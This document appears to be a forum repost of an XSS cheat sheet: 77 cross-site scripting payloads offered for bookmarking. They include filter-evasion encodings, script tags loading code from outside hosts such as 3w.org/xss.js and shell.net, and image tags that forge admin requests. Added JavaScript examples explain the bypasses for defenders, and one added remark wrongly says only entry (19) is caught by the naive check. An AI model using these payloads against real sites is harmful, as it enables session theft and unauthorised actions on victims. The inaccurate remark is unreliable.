It seems t00ls does not have much material on XSS; I saw a good list and copied it over, in case any of you want to bookmark it.
(1) Basic XSS: plain JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using the javascript: directive. (Modern browsers no longer run javascript: URLs from IMG SRC; the encoding and whitespace tricks in (3)-(19) still apply to attributes that do navigate, such as A HREF, IFRAME SRC and FORM ACTION.)
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, the scheme is matched case-insensitively
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required). In this copy the entities have already been decoded back to plain text; the point is that the browser decodes decimal references such as &#106; (the letter j) inside the attribute before it resolves the scheme, so a filter looking for the literal string javascript: never sees it.
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag (the browser recovers from the broken attributes and still parses the SCRIPT)
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode: builds the string "XSS" from character codes so no quotes are needed (use a character-code calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Decimal HTML entity encoding of the whole javascript: URL (use an encoding calculator; payload abbreviated in the source)
<IMG SRC=jav..omitted..S')>

(9) Long, zero-padded decimal entity encoding without semicolons (up to 7 digits per reference; defeats filters that look for the "&#XX;" pattern with a semicolon; use a calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex entity encoding, also without semicolons (use a calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the word "javascript" (the tab shows as a space in this copy; browsers strip tabs inside the scheme)
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab (&#x09;) splitting the word (decoded in this copy)
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline splitting the word (the newline has been lost in this copy)
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return splitting the word (lost in this copy)
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript using carriage returns between the characters, an extreme example (the line breaks have been lost in this copy)
<IMG SRC="javascript:alert('XSS')">

(16) Working around an input-length limit by splitting the payload across several script blocks (all fragments must be reflected on the same page, in order)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte inside the scheme (write the raw byte with perl, since it cannot be typed)
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte, variant 2. Null bytes rarely work in practice here, since there is seldom a place where they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG tag (the non-printing control character that followed the leading space has been decoded away in this copy; browsers trim leading spaces and control characters before reading the scheme)
<IMG SRC=" javascript:alert('XSS');">

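Entries (3) through (19) all rely on the same gap: the browser decodes entities, drops tabs, line breaks and leading control characters, and matches the scheme case-insensitively before it decides whether an attribute is a javascript: URL, while a naive filter compares the raw string. The following is an added example (not code from the original post) that performs that same normalization on a URL attribute value and compares it with a literal substring check; the sample values are constructed here from the entries above, and the benign URLs are placeholders.

```javascript
// Added example: normalize a URL attribute the way a browser does before checking its scheme.
const SCRIPT_SCHEMES = ['javascript:', 'vbscript:'];

// Decode decimal (&#106;) and hex (&#x6A;) character references. Browsers accept a
// missing ';' and leading zero padding, which is what entries (5), (9) and (10) exploit.
function decodeNumericEntities(s) {
  return s.replace(/&#(?:x([0-9a-f]+)|([0-9]+));?/gi, (m, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Mirror of the browser's attribute/URL preprocessing: decode, remove tab/LF/CR
// (and, conservatively, NUL) anywhere in the value, trim leading C0 controls and spaces.
function normalizeUrlAttribute(value) {
  return decodeNumericEntities(value)
    .replace(/[\t\n\r\u0000]/g, '')     // (11)-(15), (17): separators inside "javascript"
    .replace(/^[\u0000-\u0020]+/, '')   // (19): leading spaces and control characters
    .toLowerCase();                     // (4): the scheme is matched case-insensitively
}

function isScriptUrl(value) {
  const s = normalizeUrlAttribute(value);
  return SCRIPT_SCHEMES.some(scheme => s.startsWith(scheme));
}

// The kind of check the entries above are written to defeat.
function naiveIsScriptUrl(value) {
  return value.includes('javascript:');
}

// Constructed test values taken from the entries above (not the post's own data).
const URL_SAMPLES = {
  plain:      "javascript:alert('XSS')",                                                  // (2)
  mixedCase:  "JaVaScRiPt:alert('XSS')",                                                  // (4)
  entities:   "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // (5)
  padded:     "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')", // (9)
  hexNoSemi:  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A",                   // (10)
  tab:        "jav\tascript:alert('XSS');",                                               // (11)
  encodedTab: "jav&#x09;ascript:alert('XSS');",                                           // (12)
  newline:    "jav&#x0A;ascript:alert('XSS');",                                           // (13)
  cr:         "jav&#x0D;ascript:alert('XSS');",                                           // (14)
  nul:        "java\u0000script:alert('XSS')",                                            // (17)
  leading:    " &#14;  javascript:alert('XSS');",                                         // (19)
  image:      "http://3w.org/XSS/logo.png",                                               // benign placeholder
  relative:   "/static/a.png",                                                            // benign placeholder
};

// Names of the samples the naive substring check passes but the normalizing check flags.
function missedByNaiveCheck() {
  return Object.keys(URL_SAMPLES)
    .filter(k => isScriptUrl(URL_SAMPLES[k]) && !naiveIsNaiveSafe(k));
}
function naiveIsNaiveSafe(k) {
  return naiveIsScriptUrl(URL_SAMPLES[k]);
}
```

Note that entry (19) is the only variant the substring check happens to catch, because the literal text javascript: is still present after the leading garbage; every other variant slips past it. The safer design is an allowlist of schemes (http:, https:, relative paths) applied to the normalized value, rather than a blocklist of bad ones.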
(20) Non-alpha-non-digit XSS: the parser ends the tag name at the first character that is not a letter or digit, so "/XSS" is read as a junk attribute and the tag is still SCRIPT
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, variant 2 (junk characters after the attribute name)
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, variant 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, variant 2 (protocol-relative SRC, so "http:" never appears)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS (no closing ">")
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons (a regex literal supplies the string)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

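Entries (24), (25) and (28) target filters that delete a complete "<script>...</script>" pair: a browser does not need the closing tag to start fetching the SRC, and a regex without the dot-all flag cannot span the newline in (28). The following is an added example (not code from the original post) that runs such a filter over inputs constructed from those entries and reports which survive, next to the output-encoding fix that does not depend on recognizing any particular variant.

```javascript
// Added example: a blacklist "script stripper" versus output encoding.

// Naive filter: deletes <script ...>...</script> pairs. Without the 's' flag '.' does
// not cross a newline, and with no closing tag there is nothing to match at all.
function stripScriptPairs(html) {
  return html.replace(/<script.*?<\/script>/gi, '');
}

// The fix: encode the characters that can start a tag or end an attribute.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Constructed inputs taken from the entries above.
const TAG_SAMPLES = {
  plain:      '<SCRIPT>alert("XSS")</SCRIPT>',
  noClose:    '<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>',                 // (24)
  protoRel:   '<SCRIPT SRC=//3w.org/XSS/xss.js>',                         // (25)
  multiline:  '<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>',                // (28)
  quoteEncap: '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',      // (61)
};

// A sample "survives" when a script tag opener is still present after filtering.
function survivesStripping(name) {
  return /<script/i.test(stripScriptPairs(TAG_SAMPLES[name]));
}
function survivors() {
  return Object.keys(TAG_SAMPLES).filter(survivesStripping);
}
function survivesEncoding(name) {
  return /<script/i.test(htmlEncode(TAG_SAMPLES[name]));
}
```

With this particular regex, (24), (25) and (28) get through while (61) happens to be removed; (61) is aimed at a different class of filter, one that tracks quotes when it looks for the end of a tag. After htmlEncode() none of the inputs contain a tag, which is the point: encoding on output is independent of which bypass the attacker chose.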
(29) Escaping the application's own JavaScript escaping: when the app turns a double quote into \" but leaves backslashes alone, a leading backslash in the input neutralizes the added one, and the quote that follows closes the string
\";alert('XSS');//

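To see why (29) works, it helps to build the generated script text both ways. The following is an added example (not code from the original post): a template that puts user input into a JavaScript string literal with quote-only escaping, the same template using a proper literal encoder, and a harness that executes the result with a stub alert() to record whether the injected call ran. The variable name and template are assumptions for the demonstration.

```javascript
// Added example: the escaping bug entry (29) exploits, and the fix.

// Broken escaping: doubles quotes but not backslashes. Input \" becomes \\" in the
// script, i.e. an escaped backslash followed by a real closing quote.
function escapeQuotesOnly(s) {
  return s.replace(/"/g, '\\"');
}
function vulnerableScript(userInput) {
  return 'var name = "' + escapeQuotesOnly(userInput) + '";';
}

// Fix: let a JSON encoder produce the whole literal (it escapes backslashes, quotes and
// control characters), then also escape '<' and '>' so a "</script>" inside the value cannot
// close the HTML script block, and U+2028/U+2029, which are line terminators in JavaScript.
function safeScript(userInput) {
  const literal = JSON.stringify(userInput)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return 'var name = ' + literal + ';';
}

// Runs the generated script with alert() replaced by a recorder; returns true when the
// injected alert() call actually executed.
function alertFired(script) {
  let fired = false;
  try {
    new Function('alert', script)(() => { fired = true; });
  } catch (e) {
    // A SyntaxError means the script did not run at all: still a bug, but not code execution.
  }
  return fired;
}

// Entry (29) exactly as the attacker types it: a backslash, a double quote, then code.
const PAYLOAD = '\\";alert(\'XSS\');//';

function demo() {
  return {
    vulnerable: alertFired(vulnerableScript(PAYLOAD)),
    fixed: alertFired(safeScript(PAYLOAD)),
  };
}
```

The generated vulnerable script reads var name = "\\";alert('XSS');//"; which JavaScript parses as a one-character string followed by the attacker's statement. The encoded version keeps the whole payload inside the literal.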
(30) Closing the TITLE tag (text inside TITLE is not parsed as HTML until the element is closed)
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag with an onload handler (the handler was stripped by the forum filter in the copied line)
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC (legacy IE attribute)
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC (legacy attribute)
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND (legacy IE element)
<BGSOUND SRC="javascript:alert('XSS');">

(37) Style sheet LINK with a javascript: HREF
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet (the CSS file carries the payload, e.g. via the IE-only expression() or a javascript: url())
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) VBScript in an IMG (IE only)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with an additional URL parameter (the second URL= is the one that gets used)
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character inserted before the scheme: any of decimal code points 1-32, 34, 39, 160, 8192-8213, 12288 or 65279 is ignored by the parser (the inserted character has been decoded away in this copy)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV with a CSS expression() (IE only)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the word "expression" split by a CSS comment (IE only; the comment did not survive in this copy)
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (any tag name that starts with a letter works; IE only because of expression())
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image applied through a class
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression() (IE only; only the tail of the payload survived in this copy)
exppression(alert("XSS"))'>

(53) STYLE tag using background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE tag (relative URLs on the page are then resolved against the javascript: base)
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that contains the XSS (Flash has since been removed from browsers)
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash movie can assemble and run the XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace with an HTML Component (IE only); the .HTC file must be on the same server as the XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If ".js" is filtered, serve the JavaScript under an image file name and reference it from SCRIPT SRC; the browser does not care about the extension (the URL was lost in this copy)
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands: the image request is sent with the victim's cookies, so a state-changing GET on the target site runs with the victim's privileges (this is request forgery, not arbitrary command execution)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands, variant 2: a.jpg lives on your own server, and an Apache Redirect rule bounces the image request to the privileged action on the target
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing quote and symbol filters with HTML quote encapsulation (a ">" inside a quoted attribute confuses filters that look for the end of the tag)
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT ="">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67) Splitting the tag with document.write so the full "<SCRIPT SRC=" string never appears in the input
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL string evasion: an IP address instead of the hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL (percent) encoding of the hostname (the encoded form has been decoded in this copy)
<A HREF="http://3w.org">XSS</A>

(70) IP address as a single decimal dword (3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) IP address in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP address in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: decimal, octal and hex octets in one address, with tabs and a line break inside the URL that the browser strips (shown as spaces here)
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Protocol-relative URL, omitting "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Omitting "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>

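Entries (68) through (76) work because a URL filter that compares strings never sees the host the browser actually connects to. The following is an added example (not code from the original post) that writes out the IPv4-literal folding browsers perform, following the WHATWG URL host parser (dotted parts in decimal, 0x-prefixed hex or 0-prefixed octal, with fewer than four parts folding into the last), together with the tab/newline removal that makes (73) work and the trailing-dot handling from (76). It then puts a string-comparison blocklist next to one that compares the effective host; the blocked addresses are the ones the entries above encode, and userinfo, ports and IPv6 literals are deliberately not handled.

```javascript
// Added example: fold an obfuscated IPv4 host the way a browser's URL parser does.

// One dotted part: decimal, "0x" hex, or leading-zero octal. Returns null if not a number.
function parseIPv4Number(part) {
  if (part === '') return null;
  let radix = 10;
  if (/^0[xX]/.test(part)) { part = part.slice(2); radix = 16; }
  else if (part.length > 1 && part[0] === '0') { part = part.slice(1); radix = 8; }
  if (part === '') return 0;                       // "0x" and "0" on their own are zero
  const digits = radix === 16 ? /^[0-9a-fA-F]+$/ : radix === 8 ? /^[0-7]+$/ : /^[0-9]+$/;
  return digits.test(part) ? parseInt(part, radix) : null;
}

// Dotted-quad the host resolves to, or null when it is not an IPv4 literal (a DNS name).
function parseIPv4Host(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();   // "1.2.3.4." form
  if (parts.length > 4) return null;
  const numbers = parts.map(parseIPv4Number);
  if (numbers.some(n => n === null)) return null;
  // Every part but the last must fit in one byte; the last absorbs the remaining bytes,
  // which is how a single dword (entry 70) or "66.000146.0x7.147" (entry 73) folds.
  for (let i = 0; i < numbers.length - 1; i++) if (numbers[i] > 255) return null;
  const last = numbers[numbers.length - 1];
  if (last >= 256 ** (5 - numbers.length)) return null;
  let addr = last;
  for (let i = 0; i < numbers.length - 1; i++) addr += numbers[i] * 256 ** (3 - i);
  return [addr >>> 24, (addr >>> 16) & 255, (addr >>> 8) & 255, addr & 255].join('.');
}

// Browsers remove ASCII tab and newline anywhere in the URL before parsing (entry 73).
function stripTabNewline(s) {
  return s.replace(/[\t\n\r]/g, '');
}

// Effective host of an href: scheme optional (entry 74), IPv4 literals folded,
// trailing dot on a DNS name dropped (entry 76). Assumes no userinfo, port or IPv6.
function effectiveHost(href) {
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#]*)/i.exec(stripTabNewline(href));
  if (!m) return null;
  const host = m[1].toLowerCase();
  return parseIPv4Host(host) || host.replace(/\.$/, '');
}

// Constructed blocklist: the addresses the entries above spell out in other notations.
const BLOCKED = ['192.168.0.1', '66.102.7.147'];

// String comparison: what entries (70)-(73) bypass.
function naiveBlocked(href) {
  return BLOCKED.some(ip => href.includes(ip));
}
// Comparison on the host the browser would actually connect to.
function hostBlocked(href) {
  return BLOCKED.includes(effectiveHost(href));
}
```

The same folding is built into every WHATWG-conformant URL parser, so in practice new URL(href).hostname in a browser or in Node gives the effective host without hand-rolling the arithmetic; the point of writing it out is to show that "http://3232235521", "http://0xc0.0xa8.0x00.0x01" and "http://0300.0250.0000.0001" are one and the same destination.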
(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>